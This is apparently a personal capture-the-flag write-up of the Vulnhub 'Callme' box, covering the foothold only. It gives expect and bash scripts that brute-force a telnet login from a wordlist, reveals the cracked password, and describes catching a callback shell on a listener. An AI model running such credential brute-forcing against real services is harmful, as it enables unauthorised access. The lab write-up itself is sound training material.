Introduction

Machine name: Callme
Level: Easy
flags: user, root
Description: This is a Linux box with a custom remote access

This is CALLME: 1 from Vulnhub. I did the foothold/user part of this myself, and then checked a writeup for the privesc. Which I didn’t successfully run; whatever.

Ports

  1. 22/tcp open ssh
  2. 111/tcp open rpcbind
  3. 2323/tcp open 3d-nfsd

2323

Entry to this box is via port 2323; connecting with telnet gets this:

root@kali:/opt/vulnhub/callme# telnet 192.168.1.165 2323
Trying 192.168.1.165...
Connected to 192.168.1.165.
Escape character is '^]'.
Welcome to foxrecall server
username: 
admin
Password
dunno
Wrong password for user admin
bye!
Connection closed by foreign host.

So we need a way to bruteforce the password for admin. We know it’s admin because if we get this if we try one that doesn’t exist:

username:
doesnotexist
Password
dunno
user does not exist

Expect

I had never used /bin/expect before but some googling told me it was the way to go. Well, one way anyway. I had two scripts:

root@kali:/opt/vulnhub/callme# cat connect.sh
#!/usr/bin/expect
set timeout 20
set hostName "192.168.1.165"
set port "2323"
set userName "admin"
set password [lindex $argv 0]

spawn telnet $hostName $port

expect "Welcome to foxrecall server"
expect "username:"
send "$userName\r"
expect "Password"
send "$password\r"
expect {
    "Wrong password*" { send -- "rude_words\r\r" }
    "hello" { send -- "id\r" }
}

and:

root@kali:/opt/vulnhub/callme# cat caller.sh 
#!/bin/bash

readarray -t my_array < /usr/share/seclists/Passwords/probable-v2-top1575.txt

for line in "${my_array[@]}"; do
  ./connect.sh $line
done

What I did was run caller.sh and redirected the output to a file, which I then flicked through looking for something unusual. Yes, it’s not optimal; I’m a hack.

Anyway one entry stood out:

Wrong password for user admin
spawn telnet 192.168.1.165 2323
Trying 192.168.1.165...
Connected to 192.168.1.165.
Escape character is '^]'.
Welcome to foxrecall server
username: 
admin
Password
booboo
ONE THOUSAND THIRTY THREE 
You are not ready sorry...
bye!
Connection closed by foreign host.

So the password is booboo - what does the message mean?

ONE THOUSAND THIRTY THREE

Initially I though maybe this was a delay, like I had to wait 1.033 seconds and retry, but that didn’t seem right. What did You are not ready sorry mean? Could it be a connection back looking for an open port? The numbers always seemed to be between about 1000 and 4000. I made a new slight change to my script:

root@kali:/opt/vulnhub/callme# cat booboo.sh 
#!/usr/bin/expect
set timeout 20
set hostName "192.168.1.165"
set port "2323"
set userName "admin"
set password "booboo"

spawn telnet $hostName $port

expect "Welcome to foxrecall server"
expect "username:"
send "$userName\r"
expect "Password"
send "$password\r"
expect {
    "Wrong password*" { send -- "rude_words\r\r" }
    "hello" { send -- "id\r" }
}

I opened a listener on port 1234, called the script from an infinite loop on the command line, sending the output to the void, and waited:

root@kali:/opt/vulnhub/callme# while :; do ./booboo.sh;done > /dev/null

After a few minutes, I got my shell. This was a CMD shell, which was running under WINE. Apart from knowing it exists, I know basically nothing about WINE.

Still, I got the user. See here for someone else’s writeup of the rest. Also he had better scripts. It’s all good.